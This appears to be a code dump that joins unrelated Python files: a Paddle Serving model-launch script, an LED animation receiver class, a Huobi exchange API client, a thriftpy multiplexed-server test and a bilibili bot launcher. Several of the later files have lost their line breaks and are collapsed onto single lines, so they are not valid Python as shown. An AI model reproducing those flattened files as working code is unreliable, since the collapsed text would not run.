# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Usage:
    Host a trained paddle model with one line command
    Example:
        python -m paddle_serving_server.serve --model ./serving_server_model --port 9292
"""
import argparse
import os
import json
import base64
import time
from multiprocessing import Process
from flask import Flask, request
import sys
if sys.version_info.major == 2:
    from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
elif sys.version_info.major == 3:
    from http.server import BaseHTTPRequestHandler, HTTPServer


def serve_args():
    """Build the command-line parser for the serving entry and parse sys.argv.

    Returns:
        argparse.Namespace with every serving option (port, device, model
        paths, optimization switches, authentication fields, ...).
    """
    parser = argparse.ArgumentParser("serve")
    parser.add_argument(
        "--thread", type=int, default=2, help="Concurrency of server")
    parser.add_argument(
        "--port", type=int, default=9292, help="Port of the starting gpu")
    parser.add_argument(
        "--device", type=str, default="gpu", help="Type of device")
    parser.add_argument("--gpu_ids", type=str, default="", help="gpu ids")
    parser.add_argument(
        "--model", type=str, default="", nargs="+", help="Model for serving")
    parser.add_argument(
        "--workdir",
        type=str,
        default="workdir",
        help="Working dir of current service")
    parser.add_argument(
        "--name", type=str, default="None", help="Default service name")
    parser.add_argument(
        "--use_mkl", default=False, action="store_true", help="Use MKL")
    parser.add_argument(
        "--precision",
        type=str,
        default="fp32",
        help="precision mode(fp32, int8, fp16, bf16)")
    parser.add_argument(
        "--use_calib",
        default=False,
        action="store_true",
        help="Use TensorRT Calibration")
    parser.add_argument(
        "--mem_optim_off",
        default=False,
        action="store_true",
        help="Memory optimize")
    parser.add_argument(
        "--ir_optim", default=False, action="store_true", help="Graph optimize")
    parser.add_argument(
        "--max_body_size",
        type=int,
        default=512 * 1024 * 1024,
        help="Limit sizes of messages")
    parser.add_argument(
        "--use_encryption_model",
        default=False,
        action="store_true",
        help="Use encryption model")
    parser.add_argument(
        "--use_multilang",
        default=False,
        action="store_true",
        help="Use Multi-language-service")
    parser.add_argument(
        "--use_trt", default=False, action="store_true", help="Use TensorRT")
    parser.add_argument(
        "--use_lite", default=False, action="store_true", help="Use PaddleLite")
    parser.add_argument(
        "--use_xpu", default=False, action="store_true", help="Use XPU")
    parser.add_argument(
        "--product_name",
        type=str,
        default=None,
        help="product_name for authentication")
    parser.add_argument(
        "--container_id",
        type=str,
        default=None,
        help="container_id for authentication")
    return parser.parse_args()


def _validate_model_configs(model_configs):
    """Raise ValueError if any --model entry is a file instead of a directory.

    Directories are accepted silently; anything that is neither a dir nor a
    file (e.g. a not-yet-created path) is deliberately left to fail later,
    matching the original behavior.
    """
    for single_model_config in model_configs:
        if os.path.isdir(single_model_config):
            pass
        elif os.path.isfile(single_model_config):
            raise ValueError("The input of --model should be a dir not file.")


def start_standard_model(serving_port):  # pylint: disable=doc-string-missing
    """Start a single standard (non-multi-GPU) serving instance.

    Args:
        serving_port: port the RPC service listens on.
    """
    args = serve_args()
    thread_num = args.thread
    model = args.model
    port = serving_port
    workdir = args.workdir
    device = args.device
    # --mem_optim_off is a negative flag: memory optimization is ON by default.
    mem_optim = not args.mem_optim_off
    ir_optim = args.ir_optim
    max_body_size = args.max_body_size
    use_mkl = args.use_mkl
    use_encryption_model = args.use_encryption_model
    use_multilang = args.use_multilang

    if model == "":
        print("You must specify your serving model")
        sys.exit(-1)
    _validate_model_configs(args.model)

    # Imported lazily so that argument errors surface before the heavy import.
    import paddle_serving_server as serving
    op_maker = serving.OpMaker()
    op_seq_maker = serving.OpSeqMaker()

    read_op = op_maker.create('general_reader')
    op_seq_maker.add_op(read_op)

    for idx, single_model in enumerate(model):
        infer_op_name = "general_infer"
        # Temporary support for OCR model, it will be completely revised later.
        # If you want to use this, C++ server must compile with WITH_OPENCV
        # option.
        if len(model) == 2 and idx == 0 and model[0] == 'ocr_det_model':
            infer_op_name = "general_detection"
        general_infer_op = op_maker.create(infer_op_name)
        op_seq_maker.add_op(general_infer_op)

    general_response_op = op_maker.create('general_response')
    op_seq_maker.add_op(general_response_op)

    if use_multilang:
        server = serving.MultiLangServer()
    else:
        server = serving.Server()
    server.set_op_sequence(op_seq_maker.get_op_sequence())
    server.set_num_threads(thread_num)
    server.set_memory_optimize(mem_optim)
    server.set_ir_optimize(ir_optim)
    server.use_mkl(use_mkl)
    server.set_max_body_size(max_body_size)
    server.set_port(port)
    server.set_precision(args.precision)
    server.set_use_calib(args.use_calib)
    server.use_encryption_model(use_encryption_model)
    if args.product_name is not None:
        server.set_product_name(args.product_name)
    if args.container_id is not None:
        server.set_container_id(args.container_id)

    server.load_model_config(model)
    server.prepare_server(workdir=workdir, port=port, device=device)
    server.run_server()


def start_gpu_card_model(index, gpuid, port, args):  # pylint: disable=doc-string-missing
    """Start one serving instance bound to one GPU card (or CPU).

    Args:
        index: ordinal of this worker among the started cards; added to
            ``port`` so each card gets a distinct port.
        gpuid: GPU id to bind, or -1 to run on CPU.
        port: base port.
        args: parsed command-line namespace from serve_args().
    """
    workdir = args.workdir
    gpuid = int(gpuid)
    device = "gpu"
    if gpuid == -1:
        device = "cpu"
    elif gpuid >= 0:
        port = port + index
    thread_num = args.thread
    model = args.model
    mem_optim = not args.mem_optim_off
    ir_optim = args.ir_optim
    use_mkl = args.use_mkl
    max_body_size = args.max_body_size
    use_multilang = args.use_multilang
    if gpuid >= 0:
        # Each card gets its own working directory.
        workdir = "{}_{}".format(args.workdir, gpuid)

    if model == "":
        print("You must specify your serving model")
        sys.exit(-1)
    _validate_model_configs(args.model)

    import paddle_serving_server as serving
    op_maker = serving.OpMaker()
    op_seq_maker = serving.OpSeqMaker()

    read_op = op_maker.create('general_reader')
    op_seq_maker.add_op(read_op)

    for idx, single_model in enumerate(model):
        infer_op_name = "general_infer"
        # NOTE(review): aligned with start_standard_model — previously ANY
        # two-model combination mapped the first model to "general_detection";
        # only the OCR detection model should use the detection op.
        if len(model) == 2 and idx == 0 and model[0] == 'ocr_det_model':
            infer_op_name = "general_detection"
        general_infer_op = op_maker.create(infer_op_name)
        op_seq_maker.add_op(general_infer_op)

    general_response_op = op_maker.create('general_response')
    op_seq_maker.add_op(general_response_op)

    if use_multilang:
        server = serving.MultiLangServer()
    else:
        server = serving.Server()
    server.set_op_sequence(op_seq_maker.get_op_sequence())
    server.set_num_threads(thread_num)
    server.use_mkl(use_mkl)
    server.set_precision(args.precision)
    server.set_use_calib(args.use_calib)
    server.set_memory_optimize(mem_optim)
    server.set_ir_optimize(ir_optim)
    server.set_max_body_size(max_body_size)
    if args.use_trt:
        server.set_trt()
    if args.use_lite:
        server.set_lite()
    server.set_device(device)
    if args.use_xpu:
        server.set_xpu()
    if args.product_name is not None:
        server.set_product_name(args.product_name)
    if args.container_id is not None:
        server.set_container_id(args.container_id)

    server.load_model_config(model)
    server.prepare_server(
        workdir=workdir,
        port=port,
        device=device,
        use_encryption_model=args.use_encryption_model)
    if gpuid >= 0:
        server.set_gpuid(gpuid)
    server.run_server()


def start_multi_card(args, serving_port=None):  # pylint: disable=doc-string-missing
    """Fan serving out over all requested GPU cards (one process per card),
    or fall back to a single CPU / Lite instance when no GPUs are requested.
    """
    if serving_port is None:
        serving_port = args.port
    if args.gpu_ids == "":
        gpus = []
    else:
        gpus = args.gpu_ids.split(",")
        # Every requested id must be visible to CUDA, otherwise bail out.
        if "CUDA_VISIBLE_DEVICES" in os.environ:
            env_gpus = os.environ["CUDA_VISIBLE_DEVICES"].split(",")
            for ids in gpus:
                if ids not in env_gpus:
                    print("gpu_ids is not in CUDA_VISIBLE_DEVICES.")
                    sys.exit(-1)
        else:
            env_gpus = []

    if args.use_lite:
        print("run using paddle-lite.")
        start_gpu_card_model(-1, -1, serving_port, args)
    elif len(gpus) <= 0:
        print("gpu_ids not set, going to run cpu service.")
        start_gpu_card_model(-1, -1, serving_port, args)
    else:
        gpu_processes = []
        for i, gpu_id in enumerate(gpus):
            p = Process(
                target=start_gpu_card_model,
                args=(
                    i,
                    gpu_id,
                    serving_port,
                    args, ))
            gpu_processes.append(p)
        for p in gpu_processes:
            p.start()
        for p in gpu_processes:
            p.join()


class MainService(BaseHTTPRequestHandler):
    """HTTP front door used with --use_encryption_model: accepts the model
    decryption key via POST, launches the serving processes, and replies with
    the port(s) the real service listens on.

    Relies on module-level globals set in __main__: ``args``, ``p_flag``,
    ``p``, ``serving_port`` and ``port_is_available``.
    """

    def get_available_port(self):
        """Return the first free port in [12000, 13000), or None if all busy."""
        default_port = 12000
        for i in range(1000):
            if port_is_available(default_port + i):
                return default_port + i
        return None  # explicit: no free port found

    def start_serving(self):
        start_multi_card(args, serving_port)

    def get_key(self, post_data):
        """Extract the base64 "key" field and persist it next to each model.

        Returns False when the request carries no key.
        """
        if "key" not in post_data:
            return False
        key = base64.b64decode(post_data["key"].encode())
        for single_model_config in args.model:
            if os.path.isfile(single_model_config):
                raise ValueError(
                    "The input of --model should be a dir not file.")
            with open(single_model_config + "/key", "wb") as f:
                f.write(key)
        return True

    def check_key(self, post_data):
        """Verify the posted key matches the key stored for every model."""
        if "key" not in post_data:
            return False
        key = base64.b64decode(post_data["key"].encode())
        for single_model_config in args.model:
            if os.path.isfile(single_model_config):
                raise ValueError(
                    "The input of --model should be a dir not file.")
            with open(single_model_config + "/key", "rb") as f:
                cur_key = f.read()
            if key != cur_key:
                return False
        return True

    def start(self, post_data):
        """Launch serving on first request; on later requests just re-check
        the key. Returns True when serving is (already) running with a valid
        key."""
        post_data = json.loads(post_data.decode('utf-8'))
        global p_flag
        if not p_flag:
            # First request: store the key (if encryption is on) and spawn
            # the serving process.
            if args.use_encryption_model:
                print("waiting key for model")
                if not self.get_key(post_data):
                    print("not found key in request")
                    return False
            global serving_port
            global p
            serving_port = self.get_available_port()
            p = Process(target=self.start_serving)
            p.start()
            time.sleep(3)  # give the child a moment to come up
            if p.is_alive():
                p_flag = True
            else:
                return False
        else:
            # Serving already launched: only accept requests with the same key.
            if p.is_alive():
                if not self.check_key(post_data):
                    return False
            else:
                return False
        return True

    def do_POST(self):
        content_length = int(self.headers['Content-Length'])
        post_data = self.rfile.read(content_length)
        if self.start(post_data):
            response = {"endpoint_list": [serving_port]}
        else:
            response = {"message": "start serving failed"}
        self.send_response(200)
        self.send_header('Content-type', 'application/json')
        self.end_headers()
        self.wfile.write(json.dumps(response).encode())


if __name__ == "__main__":

    args = serve_args()
    _validate_model_configs(args.model)
    if args.name == "None":
        from .web_service import port_is_available
        if args.use_encryption_model:
            p_flag = False
            p = None
            serving_port = 0
            server = HTTPServer(('localhost', int(args.port)), MainService)
            print(
                'Starting encryption server, waiting for key from client, use <Ctrl-C> to stop'
            )
            server.serve_forever()
        else:
            start_multi_card(args)
    else:
        from .web_service import WebService
        web_service = WebService(name=args.name)
        web_service.load_model_config(args.model)
        gpu_ids = args.gpu_ids
        if gpu_ids == "":
            # Fall back to whatever CUDA exposes when --gpu_ids is not given.
            if "CUDA_VISIBLE_DEVICES" in os.environ:
                gpu_ids = os.environ["CUDA_VISIBLE_DEVICES"]
        if len(gpu_ids) > 0:
            web_service.set_gpus(gpu_ids)
        web_service.prepare_server(
            workdir=args.workdir,
            port=args.port,
            device=args.device,
            use_lite=args.use_lite,
            use_xpu=args.use_xpu,
            ir_optim=args.ir_optim,
            thread_num=args.thread,
            precision=args.precision,
            use_calib=args.use_calib)
        web_service.run_rpc_service()

        app_instance = Flask(__name__)

        @app_instance.before_first_request
        def init():
            web_service._launch_web_service()

        service_name = "/" + web_service.name + "/prediction"

        @app_instance.route(service_name, methods=["POST"])
        def run():
            return web_service.get_prediction(request)

        app_instance.run(host="0.0.0.0",
                         port=web_service.port,
                         threaded=False,
                         processes=4)
receiver.py
from . animation import Animation
from .. util import log
import threading
from enum import IntEnum


class HOST_TYPE(IntEnum):
    """Layout geometries a Receiver knows how to drive."""
    STRIP = 1
    MATRIX = 2
    CIRCLE = 3
    CUBE = 4


# Maps a layout class name (type(layout).__name__) to its HOST_TYPE member.
HOST_MAP = {
    'Strip': HOST_TYPE.STRIP,
    'Matrix': HOST_TYPE.MATRIX,
    'Circle': HOST_TYPE.CIRCLE,
    'Cube': HOST_TYPE.CUBE,
}


class Receiver(Animation):
    """Animation driven by externally received data instead of a local clock.

    A subclass assigns the callable that performs the actual receiving to
    ``self._recv_thread_obj``; that callable runs on a daemon thread, writes
    incoming frames to the buffer, and calls ``self._hold_for_data.set()``
    to release step().
    """
    free_run = True

    def __init__(self, layout, **kwds):
        super().__init__(layout, **kwds)

        name = type(self.layout).__name__
        if name not in HOST_MAP:
            # Fixed: original message was missing the space before the list
            # ("...of typeStrip, Matrix, ...").
            raise ValueError('layout must be of type ' + ', '.join(HOST_MAP))
        self.host_type = HOST_MAP[name]

        self._hold_for_data = threading.Event()
        self._stop_event = threading.Event()
        self._stop_event.clear()
        # Receive-loop callable; must be set by the subclass before start().
        self._recv_thread_obj = None

    def pre_run(self):
        self.start()

    def start(self):
        """Spawn the receive loop on a daemon thread."""
        self._t = threading.Thread(target=self._recv_thread_obj)
        self._t.daemon = True  # don't hang on exit (setDaemon() is deprecated)
        self._t.start()
        # NOTE(review): self.address is not defined in this class; it is
        # presumably set by the concrete subclass before start() — confirm.
        log.info("Receiver Listening on %s", self.address)

    def thread_cleanup(self):
        # To be overriden, if need be
        pass

    def stop(self):
        """Signal the receive loop to stop and run subclass cleanup."""
        self._stop_event.set()
        log.info("Stopping Receiver...")
        self.thread_cleanup()

    def _exit(self, exc_type, exc_value, exc_tb):
        # Context-manager-style exit hook; parameters renamed so they no
        # longer shadow the builtins `type` and `traceback`.
        self.stop()

    def step(self, amt=1):
        """
        This may seem silly, but on a Receiver step() need not do anything.

        Instead, receive the data on the receive thread and set it on the
        buffer then call self._hold_for_data.set()
        """
        if not self._stop_event.is_set():  # is_set(): isSet() is deprecated
            self._hold_for_data.wait()
            self._hold_for_data.clear()


from .. util import deprecated
if deprecated.allowed():  # pragma: no cover
    BaseReceiver = Receiver
vnhuobi.py
# encoding: utf-8 import urllib import hmac import base64 import hashlib import requests import traceback from copy import copy from datetime import datetime from threading import Thread from queue import Queue, Empty from multiprocessing.dummy import Pool from time import sleep import json import zlib from websocket import create_connection, _exceptions # 常量定义 TIMEOUT = 5 HUOBI_API_HOST = "api.huobi.pro" HADAX_API_HOST = "api.hadax.com" LANG = 'zh-CN' DEFAULT_GET_HEADERS = { "Content-type": "application/x-www-form-urlencoded", 'Accept': 'application/json', 'Accept-Language': LANG, 'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0' } DEFAULT_POST_HEADERS = { 'Content-Type': 'application/json', 'Accept': 'application/json', 'Accept-Language': LANG, 'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0' } #---------------------------------------------------------------------- def createSign(params, method, host, path, secretKey): """创建签名""" sortedParams = sorted(params.items(), key=lambda d: d[0], reverse=False) encodeParams = urllib.urlencode(sortedParams) payload = [method, host, path, encodeParams] payload = '\n'.join(payload) payload = payload.encode(encoding='UTF8') secretKey = secretKey.encode(encoding='UTF8') digest = hmac.new(secretKey, payload, digestmod=hashlib.sha256).digest() signature = base64.b64encode(digest) signature = signature.decode() return signature ######################################################################## class TradeApi(object): """交易API""" HUOBI = 'huobi' HADAX = 'hadax' SYNC_MODE = 'sync' ASYNC_MODE = 'async' #---------------------------------------------------------------------- def __init__(self): """Constructor""" self.accessKey = '' self.secretKey = '' self.mode = self.ASYNC_MODE self.active = False # API工作状态 self.reqid = 0 # 请求编号 self.queue = Queue() # 请求队列 self.pool = None # 线程池 #---------------------------------------------------------------------- def 
init(self, host, accessKey, secretKey, mode=None): """初始化""" if host == self.HUOBI: self.hostname = HUOBI_API_HOST else: self.hostname = HADAX_API_HOST self.hosturl = 'https://%s' %self.hostname self.accessKey = accessKey self.secretKey = secretKey if mode: self.mode = mode self.proxies = {} return True #---------------------------------------------------------------------- def start(self, n=10): """启动""" self.active = True if self.mode == self.ASYNC_MODE: self.pool = Pool(n) self.pool.map_async(self.run, range(n)) #---------------------------------------------------------------------- def close(self): """停止""" self.active = False self.pool.close() self.pool.join() #---------------------------------------------------------------------- def httpGet(self, url, params): """HTTP GET""" headers = copy(DEFAULT_GET_HEADERS) postdata = urllib.urlencode(params) try: response = requests.get(url, postdata, headers=headers, timeout=TIMEOUT) if response.status_code == 200: return True, response.json() else: return False, u'GET请求失败,状态代码:%s' %response.status_code except Exception as e: return False, u'GET请求触发异常,原因:%s' %e #---------------------------------------------------------------------- def httpPost(self, url, params, add_to_headers=None): """HTTP POST""" headers = copy(DEFAULT_POST_HEADERS) postdata = json.dumps(params) try: response = requests.post(url, postdata, headers=headers, timeout=TIMEOUT) if response.status_code == 200: return True, response.json() else: return False, u'POST请求失败,返回信息:%s' %response.json() except Exception as e: return False, u'POST请求触发异常,原因:%s' %e #---------------------------------------------------------------------- def generateSignParams(self): """生成签名参数""" timestamp = datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%S') d = { 'AccessKeyId': self.accessKey, 'SignatureMethod': 'HmacSHA256', 'SignatureVersion': '2', 'Timestamp': timestamp } return d #---------------------------------------------------------------------- def apiGet(self, path, params): 
"""API GET""" method = 'GET' params.update(self.generateSignParams()) params['Signature'] = createSign(params, method, self.hostname, path, self.secretKey) url = self.hosturl + path return self.httpGet(url, params) #---------------------------------------------------------------------- def apiPost(self, path, params): """API POST""" method = 'POST' signParams = self.generateSignParams() signParams['Signature'] = createSign(signParams, method, self.hostname, path, self.secretKey) url = self.hosturl + path + '?' + urllib.urlencode(signParams) return self.httpPost(url, params) #---------------------------------------------------------------------- def addReq(self, path, params, func, callback): """添加请求""" # 异步模式 if self.mode == self.ASYNC_MODE: self.reqid += 1 req = (path, params, func, callback, self.reqid) self.queue.put(req) return self.reqid # 同步模式 else: return func(path, params) #---------------------------------------------------------------------- def processReq(self, req): """处理请求""" path, params, func, callback, reqid = req result, data = func(path, params) if result: if data['status'] == 'ok': callback(data['data'], reqid) else: msg = u'错误代码:%s,错误信息:%s' %(data['err-code'], data['err-msg']) self.onError(msg, reqid) else: self.onError(data, reqid) # 失败的请求重新放回队列,等待下次处理 self.queue.put(req) #---------------------------------------------------------------------- def run(self, n): """连续运行""" while self.active: try: req = self.queue.get(timeout=1) self.processReq(req) except Empty: pass #---------------------------------------------------------------------- def getSymbols(self): """查询合约代码""" if self.hostname == HUOBI_API_HOST: path = '/v1/common/symbols' else: path = '/v1/hadax/common/symbols' params = {} func = self.apiGet callback = self.onGetSymbols return self.addReq(path, params, func, callback) #---------------------------------------------------------------------- def getCurrencys(self): """查询支持货币""" if self.hostname == HUOBI_API_HOST: path = 
'/v1/common/currencys' else: path = '/v1/hadax/common/currencys' params = {} func = self.apiGet callback = self.onGetCurrencys return self.addReq(path, params, func, callback) #---------------------------------------------------------------------- def getTimestamp(self): """查询系统时间""" path = '/v1/common/timestamp' params = {} func = self.apiGet callback = self.onGetTimestamp return self.addReq(path, params, func, callback) #---------------------------------------------------------------------- def getAccounts(self): """查询账户""" path = '/v1/account/accounts' params = {} func = self.apiGet callback = self.onGetAccounts return self.addReq(path, params, func, callback) #---------------------------------------------------------------------- def getAccountBalance(self, accountid): """查询余额""" if self.hostname == HUOBI_API_HOST: path = '/v1/account/accounts/%s/balance' %accountid else: path = '/v1/hadax/account/accounts/%s/balance' %accountid params = {} func = self.apiGet callback = self.onGetAccountBalance return self.addReq(path, params, func, callback) #---------------------------------------------------------------------- def getOrders(self, symbol, states, types=None, startDate=None, endDate=None, from_=None, direct=None, size=None): """查询委托""" path = '/v1/order/orders' params = { 'symbol': symbol, 'states': states } if types: params['types'] = types if startDate: params['start-date'] = startDate if endDate: params['end-date'] = endDate if from_: params['from'] = from_ if direct: params['direct'] = direct if size: params['size'] = size func = self.apiGet callback = self.onGetOrders return self.addReq(path, params, func, callback) #---------------------------------------------------------------------- def getMatchResults(self, symbol, types=None, startDate=None, endDate=None, from_=None, direct=None, size=None): """查询委托""" path = '/v1/order/matchresults' params = { 'symbol': symbol } if types: params['types'] = types if startDate: params['start-date'] = startDate if 
endDate: params['end-date'] = endDate if from_: params['from'] = from_ if direct: params['direct'] = direct if size: params['size'] = size func = self.apiGet callback = self.onGetMatchResults return self.addReq(path, params, func, callback) #---------------------------------------------------------------------- def getOrder(self, orderid): """查询某一委托""" path = '/v1/order/orders/%s' %orderid params = {} func = self.apiGet callback = self.onGetOrder return self.addReq(path, params, func, callback) #---------------------------------------------------------------------- def getMatchResult(self, orderid): """查询某一委托""" path = '/v1/order/orders/%s/matchresults' %orderid params = {} func = self.apiGet callback = self.onGetMatchResult return self.addReq(path, params, func, callback) #---------------------------------------------------------------------- def placeOrder(self, accountid, amount, symbol, type_, price=None, source=None): """下单""" if self.hostname == HUOBI_API_HOST: path = '/v1/order/orders/place' else: path = '/v1/hadax/order/orders/place' params = { 'account-id': accountid, 'amount': amount, 'symbol': symbol, 'type': type_ } if price: params['price'] = price if source: params['source'] = source func = self.apiPost callback = self.onPlaceOrder return self.addReq(path, params, func, callback) #---------------------------------------------------------------------- def cancelOrder(self, orderid): """撤单""" path = '/v1/order/orders/%s/submitcancel' %orderid params = {} func = self.apiPost callback = self.onCancelOrder return self.addReq(path, params, func, callback) #---------------------------------------------------------------------- def batchCancel(self, orderids): """批量撤单""" path = '/v1/order/orders/batchcancel' params = { 'order-ids': orderids } func = self.apiPost callback = self.onBatchCancel return self.addReq(path, params, func, callback) #---------------------------------------------------------------------- def onError(self, msg, reqid): """错误回调""" print 
msg, reqid #---------------------------------------------------------------------- def onGetSymbols(self, data, reqid): """查询代码回调""" #print reqid, data for d in data: print d #---------------------------------------------------------------------- def onGetCurrencys(self, data, reqid): """查询货币回调""" print reqid, data #---------------------------------------------------------------------- def onGetTimestamp(self, data, reqid): """查询时间回调""" print reqid, data #---------------------------------------------------------------------- def onGetAccounts(self, data, reqid): """查询账户回调""" print reqid, data #---------------------------------------------------------------------- def onGetAccountBalance(self, data, reqid): """查询余额回调""" print reqid, data for d in data['data']['list']: print d #---------------------------------------------------------------------- def onGetOrders(self, data, reqid): """查询委托回调""" print reqid, data #---------------------------------------------------------------------- def onGetMatchResults(self, data, reqid): """查询成交回调""" print reqid, data #---------------------------------------------------------------------- def onGetOrder(self, data, reqid): """查询单一委托回调""" print reqid, data #---------------------------------------------------------------------- def onGetMatchResult(self, data, reqid): """查询单一成交回调""" print reqid, data #---------------------------------------------------------------------- def onPlaceOrder(self, data, reqid): """委托回调""" print reqid, data #---------------------------------------------------------------------- def onCancelOrder(self, data, reqid): """撤单回调""" print reqid, data #---------------------------------------------------------------------- def onBatchCancel(self, data, reqid): """批量撤单回调""" print reqid, data ######################################################################## class DataApi(object): """行情接口""" #---------------------------------------------------------------------- def __init__(self): """Constructor""" self.ws 
= None self.url = '' self.reqid = 0 self.active = False self.thread = Thread(target=self.run) self.subDict = {} self.url = '' self.proxyHost = '' self.proxyPort = 0 #---------------------------------------------------------------------- def run(self): """执行连接""" while self.active: try: stream = self.ws.recv() result = zlib.decompress(stream, 47).decode('utf-8') data = json.loads(result) self.onData(data) except zlib.error: self.onError(u'数据解压出错:%s' %stream) except: self.onError('行情服务器连接断开') result = self.reconnect() if not result: self.onError(u'等待3秒后再次重连') sleep(3) else: self.onError(u'行情服务器重连成功') self.resubscribe() #---------------------------------------------------------------------- def reconnect(self): """重连""" try: if not self.proxyHost: self.ws = create_connection(self.url) else: self.ws = create_connection(self.url, http_proxy_host=self.proxyHost, http_proxy_port=self.proxyPort) return True except: msg = traceback.format_exc() self.onError(u'行情服务器重连失败:%s' %msg) return False #---------------------------------------------------------------------- def resubscribe(self): """重新订阅""" d = self.subDict self.subDict = {} for topic in d.keys(): self.subTopic(topic) #---------------------------------------------------------------------- def connect(self, url, proxyHost='', proxyPort=0): """连接""" self.url = url self.proxyHost = proxyHost self.proxyPort = proxyPort try: if not self.proxyHost: self.ws = create_connection(self.url) else: self.ws = create_connection(self.url, http_proxy_host=self.proxyHost, http_proxy_port=self.proxyPort) self.active = True self.thread.start() return True except: msg = traceback.format_exc() self.onError(u'行情服务器连接失败:%s' %msg) return False #---------------------------------------------------------------------- def close(self): """停止""" if self.active: self.active = False self.thread.join() self.ws.close() #---------------------------------------------------------------------- def sendReq(self, req): """发送请求""" stream = json.dumps(req) 
self.ws.send(stream) #---------------------------------------------------------------------- def pong(self, data): """响应心跳""" req = {'pong': data['ping']} self.sendReq(req) #---------------------------------------------------------------------- def subTopic(self, topic): """订阅主题""" if topic in self.subDict: return self.reqid += 1 req = { 'sub': topic, 'id': str(self.reqid) } self.sendReq(req) self.subDict[topic] = str(self.reqid) #---------------------------------------------------------------------- def unsubTopic(self, topic): """取消订阅主题""" if topic not in self.subDict: return req = { 'unsub': topic, 'id': self.subDict[topic] } self.sendReq(req) del self.subDict[topic] #---------------------------------------------------------------------- def subscribeMarketDepth(self, symbol): """订阅行情深度""" topic = 'market.%s.depth.step0' %symbol self.subTopic(topic) #---------------------------------------------------------------------- def subscribeTradeDetail(self, symbol): """订阅成交细节""" topic = 'market.%s.trade.detail' %symbol self.subTopic(topic) #---------------------------------------------------------------------- def subscribeMarketDetail(self, symbol): """订阅市场细节""" topic = 'market.%s.detail' %symbol self.subTopic(topic) #---------------------------------------------------------------------- def onError(self, msg): """错误推送""" print msg #---------------------------------------------------------------------- def onData(self, data): """数据推送""" if 'ping' in data: self.pong(data) elif 'ch' in data: if 'depth.step' in data['ch']: self.onMarketDepth(data) elif 'trade.detail' in data['ch']: self.onTradeDetail(data) elif 'detail' in data['ch']: self.onMarketDetail(data) elif 'err-code' in data: self.onError(u'错误代码:%s, 信息:%s' %(data['err-code'], data['err-msg'])) #---------------------------------------------------------------------- def onMarketDepth(self, data): """行情深度推送 """ print data #---------------------------------------------------------------------- def 
onTradeDetail(self, data): """成交细节推送""" print data #---------------------------------------------------------------------- def onMarketDetail(self, data): """市场细节推送""" print data
# ===== file: test_multiplexed.py =====
# -*- coding: utf-8 -*- from __future__ import absolute_import import os import multiprocessing import time import pytest import thriftpy from thriftpy.protocol import ( TBinaryProtocolFactory, TMultiplexedProtocolFactory ) from thriftpy.rpc import client_context from thriftpy.server import TThreadedServer from thriftpy.thrift import TProcessor, TMultiplexedProcessor from thriftpy.transport import TBufferedTransportFactory, TServerSocket mux = thriftpy.load(os.path.join(os.path.dirname(__file__), "multiplexed.thrift")) sock_path = "/tmp/thriftpy_test.sock" class DispatcherOne(object): def doThingOne(self): return True class DispatcherTwo(object): def doThingTwo(self): return True @pytest.fixture(scope="module") def server(request): p1 = TProcessor(mux.ThingOneService, DispatcherOne()) p2 = TProcessor(mux.ThingTwoService, DispatcherTwo()) mux_proc = TMultiplexedProcessor() mux_proc.register_processor("ThingOneService", p1) mux_proc.register_processor("ThingTwoService", p2) _server = TThreadedServer(mux_proc, TServerSocket(unix_socket=sock_path), iprot_factory=TBinaryProtocolFactory(), itrans_factory=TBufferedTransportFactory()) ps = multiprocessing.Process(target=_server.serve) ps.start() time.sleep(0.1) def fin(): if ps.is_alive(): ps.terminate() try: os.remove(sock_path) except IOError: pass request.addfinalizer(fin) def client_one(timeout=3000): binary_factory = TBinaryProtocolFactory() multiplexing_factory = TMultiplexedProtocolFactory(binary_factory, "ThingOneService") return client_context(mux.ThingOneService, unix_socket=sock_path, timeout=timeout, proto_factory=multiplexing_factory) def client_two(timeout=3000): binary_factory = TBinaryProtocolFactory() multiplexing_factory = TMultiplexedProtocolFactory(binary_factory, "ThingTwoService") return client_context(mux.ThingTwoService, unix_socket=sock_path, timeout=timeout, proto_factory=multiplexing_factory) def test_multiplexed_server(server): with client_one() as c: assert c.doThingOne() is True with 
client_two() as c: assert c.doThingTwo() is True
# ===== file: run.py =====
from OnlineHeart import OnlineHeart from Silver import Silver from LotteryResult import LotteryResult from Tasks import Tasks from connect import connect from rafflehandler import Rafflehandler import asyncio from login import login import utils from printer import Printer from statistics import Statistics from bilibili import bilibili import threading import biliconsole loop = asyncio.get_event_loop() loop1 = asyncio.get_event_loop() printer = Printer() bilibili() Statistics() rafflehandler = Rafflehandler() biliconsole.Biliconsole() task = OnlineHeart() task1 = Silver() task2 = Tasks() task3 = LotteryResult() task4 = connect() console_thread = threading.Thread(target=biliconsole.controler) console_thread.start() tasks1 = [ login().login() ] loop.run_until_complete(asyncio.wait(tasks1)) tasks = [ utils.fetch_user_info(), utils.fetch_bag_list(), task.run(), task1.run(), task2.run(), biliconsole.Biliconsole().run(), task4.connect(), task3.query(), rafflehandler.run() ] loop.run_until_complete(asyncio.wait(tasks)) console_thread.join() loop.close()
# ===== file: OscData.py =====
